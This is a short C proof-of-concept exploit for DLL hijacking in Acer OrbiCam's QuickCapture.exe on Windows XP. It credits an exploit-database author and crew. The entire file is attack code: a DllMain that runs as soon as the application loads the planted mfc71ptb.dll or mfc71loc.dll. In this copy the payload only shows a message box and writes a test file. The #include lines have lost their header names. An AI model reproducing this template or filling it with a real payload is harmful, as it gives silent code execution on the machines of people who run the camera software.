/* *Acer OrbiCam DLL Hijacking Exploit (mfc71ptb.dll and mfc71loc.dll) *Author: Inj3cti0n P4ck3t *Contact e-mail: fer_henrick@hotmail.com *Operating System: Windows XP (Version 5.1 Service Pack 3) *Name Application: QuickCapture.exe *Software Acer Orbicam *Name DLL: mfc71ptb.dll and mfc71loc.dll *Greetz: Inj3ct0r.com (Inj3ct0r Exploit DataBase) and fvox - HADES - M4V3RiCk - T4ph0d4 - DD3str0y3r - C00l3r - Archit3ct - Red Eye Crew */ #include #include int teste() { MessageBox(0, "Test", "and Test", MB_OK); FILE *fp; fp = fopen("teste.txt", "w"); fwrite("it works ;-)", 1, 12, fp); fclose(fp); exit(1); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { teste(); return TRUE; }